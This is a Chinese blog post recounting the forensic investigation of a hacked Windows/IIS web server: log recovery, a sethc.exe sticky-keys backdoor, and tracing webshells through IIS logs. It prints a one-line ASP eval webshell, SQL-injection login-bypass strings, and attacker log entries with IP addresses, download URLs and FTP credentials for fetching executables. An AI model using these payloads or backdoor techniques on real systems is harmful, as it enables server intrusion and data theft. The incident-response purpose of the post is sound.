安全专家:真实的网络***取证纪实
网站代码审查——是否存在一句话***,源代码上是否存在恶意代码插入
杀毒软件版本更新情况——是否是最新版本,配置的是否合理,配套的监视是否全部打开
数据恢复——>利用专用数据恢复软件进行数据恢复,恢复一些被删除的日志信息和系统信息,曾经安装过的文件操作信息。
提取可疑文件(病毒、***、后门、恶意广告插件)——在系统文件目录利用第三方或者自开发软件,对可疑文件进行提取并进行深度分析。
利用Datarecover软件来恢复一些被删除的文件,目的是希望从被删除的 文件来找出一些***或者后门以及病毒。进行深度分析,把曾经做过的格式化,以及在回收站中删除过的文件恢复过来,但是遗憾的是成功拿下这台服务器权限的黑 客已经做了专业处理,把他的一些痕迹进行了全面清理,个人认为他使用了日本地下***组织开发的专项日志清除工具,经过我和助手的共同努力还是把系统日志恢 复到当年5月份。
在本服务器的c盘根目录下面有一个sethc..exe 文件。这个文件是微软自带的,是系统粘制键,真实的大小应为27kb,而这个文件为270kb,起初我以为是由于打补丁的原因。但是经过翻阅一些资料和做 比对之后,才知道这样的文件是一个新开发的流行后门,主要用法:通过3389终端,然后通过5次敲击shift键,直接调用sethc.exe而直接取得 系统权限。随后达到控制整个服务器,通常他还是通过删除正常的一些c盘exe文件。然后把自己伪造成那个所删除的exe文件名。造成一种假象。
目的是通过抓数据包来找出问题。如果对方安装的有远程控制终端,他肯定需要让保存在服务器上的后门和控制终端进行通话,会有一个会话连接。通过防火墙的拦截功能而去寻找出控制的源头。这个上面没有发现存在反弹***,所以没有看到***的源头。
作用:检查系统日志是否被***者清除,如果日志被***者删除,需要用数据恢复软件恢复操作系统日志
检查内容:主要包括IIS日志,安全性日志,系统日志。
找到日志后,仔细分析网站是否有***者留下的webshell,尤其是一句话后门
根据Webshell的名字, 在IIS 访问日志里搜索相关的名字,找到***者常用的ip地址,分析ip地址
还可以根据此IP地址检索IIS日志中,此***者都进行过什么样的操作
技术点滴:如果你比较熟悉Webshell,通过Get操作可以知道***者都进行过何种操作。因为Get操作是被系统记录的。
通过iis的log访问日志,排查出三个可疑目标,其中一个手法相对于后两个***者更熟练一些,他 在今年5月份左右或者更早就拿到了该服务器权限,上来之后到是没有做任何的添加和修改,从技术上来看,他是通过寻找网站的注入点进来的,然后在上面放了不 少的后门,还放了一个mm.exe的文件,但是因为技术问题,没有把这个马运行起来,从外部访问只是在主页上显示为mm.jpeg,伪装成了图片。但是打 开以后,什么都没有。经过我们分析以后,它是一张裸女的jpeg文件。如果他这个mm.exe成功,完全有可能将该主站页面换成一张×××。危害还是有 的。另外该站点权限给的过高,在访问新闻频道的时候,直接就是sa权限。这个是最高系统级和Admin是一个级别的。
2007-07-15 15:08:56 61.184.107.206 写下载exe的vbs脚本 c:\admin.vbs 试图下载exe地址为: [url]http://www.dianqiji.com/pic/2007/0428/admin.exe[/url]
2007-08-25 08:12:45 218.28.24.118 写入另一个webshell D:\ybcenter\ggsm.asp
之后,218.28.24.118用以前留下的功能比较全的webshell /Cnnsc.asp和/system/unit/Cnnsc.asp频繁操作服务器上文件
2007-11-11 14:23:23 218.28.24.118 用他曾经留下的操作数据库的后门/service/asp.asp访问敏感数据库的信息
2007-08-25 08:27:57 218.28.24.118 用他曾经留下的操作数据库的后门/system/unit/sql.asp访问敏感数据库的信息
2007-11-11 11:02:55 218.28.24.118 试图访问他曾经留下的操作数据库的后门/yb/in_main3.asp访问敏感数据库
2007-08-26 07:43:47 123.5.57.117 试图***服务器
2007-08-26 07:43:47 123.5.57.117 写ftp下载exe的脚本c:\zxq.txt ftp服务器203.253.31.244 用户名kick1000 密码84460965 下载1.exe
方法:检查注册表里面的sam文件有没有相同的fv,在这里检查过程中没有发现存在有克隆帐号。
2007-12-01 08:55:16 220.175.79.231 检测注入
2007-12-03 18:40:48 218.28.68.126 检测注入
2007-12-04 01:31:32 218.28.192.90 检测注入,扫描web目录
2007-12-04 23:23:33 221.5.55.76 检测注入
2007-12-05 09:20:57 222.182.140.71 检测注入
2007-12-08 09:39:53 218.28.220.154 检测注入
2007-12-08 21:31:44 123.5.197.40 检测注入
2007-12-09 05:32:14 218.28.246.10 检测注入
2007-12-09 08:47:43 218.28.192.90 检测注入
2007-12-09 16:50:39 61.178.89.229 检测注入
2007-12-10 05:50:24 58.54.98.40 检测注入
下面是我们得到的一些他的网马。
gg3.asp Q:183637log.asppigpot.aspwebdown.vbsattach/a.gifattach/chongtian.gifattach/111.rarsystem/unit/yjh.asp system/unit/conn.asp 加入防注入Q:6242889678 p_w_picpaths/mm.jpg = exe自解压 主页包含文件 |
备份一句话*** <%eval(request("a"):response.end%>
注射检查,在IIS里面查找是否存在的有针对 %20 and 1=1’sql
'or'='or' a'or'1=1-- ,'or1=1-- ,"or1=1-- ,or1=1--, 'or'a'='a, "or"="a'='a等
作用:躲避验证信息 主要用在后台登陆上
针对一些下载者这样的*** ,主要需要在windows /document and setting下面的local setting 的 temp 或者 temp internet的这个文件夹中查看刚生成的exe文件,重点查看一下在system32文件夹下面的exe文件,尤其关注最新生成的exe文件,伪造的 系统文件等。
转载于:https://blog.51cto.com/trustsec/68105
安全专家:真实的网络***取证纪实相关推荐
- 安全专家:真实的网络攻击取证纪实
随着信息技术的发展,越来越多的人都喜欢用计算机办公,发邮件,建设自己的个人站点,公司建立自己的企业站点,政府也逐渐的采取了网上办公,更好的为人民服务,银行和证券机构也都开始依托互联网来进行金融和股票交 ...
- Nessus: 漏洞扫描器-网络取证工具
Nessue 要理解网络漏洞攻击,应该理解攻击者不是单独攻击,而是组合攻击.因此,本文介绍了关于Nessus历史的研究,它是什么以及它如何与插件一起工作.研究了Nessus的特点,使其成为网络取证中非 ...
- 网络取证第四、九章实验
网络取证 第四章案例 一.Ann的异常即时通信[TCP.UDP] 1.课本案例 利用封装协议中的信息 0X4500 IPV4协议数据包的开始 利用TCP/UDP端口号,与默认的标准服务相对应 分析源或 ...
- 弱网测试工具以及模拟真实的网络环境
弱网测试的情况和意义我就不讲了,基本上浏览器搜一下就清楚了,我这里主要是讲下我在实际测试环境中对弱网的工具选择以及怎么去模拟真实的网络环境. 弱网工具 现在网络上用于限制网络的工具有很多,我这里主要介 ...
- 6-wireshark网络安全分析——网络取证一
1. 通过Wireshark网络取证 Wireshark既然可以解析网络中的各种数据流量,那么通过网络传输协议,例如ftp协议传输的文件数据wireshark也可以对其解析,本质上FTP协议是基于传输 ...
- 【网络取证篇】suy网络工具包
suy网络工具包及补充说明 经常查询各类信息用网页收藏夹不是太方便,偷了个懒,把常用的一些查询网站借助Rolan工具汇总成工具箱,没什么介绍的,所见即所得,在文档里补充了其它一些网络安全资源,请忽 ...
- 半夜钱款莫名被转走!睡觉手机到底该不该关机?安全专家解读新型网络盗窃!...
(点击上方公号,快速关注我们) 来源:360 - 黄琳 近期各地陆续发生一些利用短信验证码冒用身份的案件,攻击者窃取银行账户.金融类app中的财产,被害者甚至莫名"被网贷",蒙受了 ...
- 15.wireshark学习-网络取证练习2
难题2:安跳过保释 2009年10月10日 / SHERRI / 7条评论 在被保释后,安·德雷克消失了!幸运的是,调查人员在她逃离城镇之前仔细监视了她的网络活动.警察局长说:"我们相信安在 ...
- BlackHat2017热点之数据取证与事件响应
美国黑帽大会(Black Hat USA)创办于1997年,被公认为世界信息安全行业的最高盛会,也是最具技术性的信息安全会议.大会每年吸引全球来自100多个国家的超过1万5千名专业观众参与.250多家 ...
最新文章
- IPv4_数据报文首部格式
- html如何创建学生信息表,创建学生对象并且能访问网页
- 服务器和运行内存,服务器运行内存不够的解决方法
- 系统部署文档_惊喜!Alibaba架构师终于发布“微服务架构与实践”文档
- CSS设置段落的垂直对齐
- Mozilla宣布关闭 Persona
- OpenGL ES 2.0 for iPhone Tutorial
- java连接phpstudy_PHPStudy快速自动搞定所有配置文件
- 江苏省计算机分级考试试题,江苏省计算机等级考试基础知识考题.doc
- 红橙Darren视频笔记 条件查询 删除 更新,数据库结合http做缓存机制(数据库操作)下
- JAVA基础系列:Arrays.binarySearch二分查找
- ssma迁移助手_如何使用SQL Server迁移助手(SSMA)和SSIS将MySQL表迁移到SQL Server
- Angular通过XHR加载模板而限制使用file://(解决方案)
- Informatica_(2)第一个例子
- Hadoop中Yarnrunner里面submit Job以及AM生成 至Job处理过程源码解析
- IP地址、子网掩码、有效子网数、有效主机数
- c语言24小时计时法转换为12小时,12时24时换算题(24小时和12小时换算方法)
- ios真机调试出现“不受信任的开发者”解决方法
- linux系统在当前目录下创建子目录,linux根目录下一级子目录
- dot格式绘图工具 html,使用dot来绘图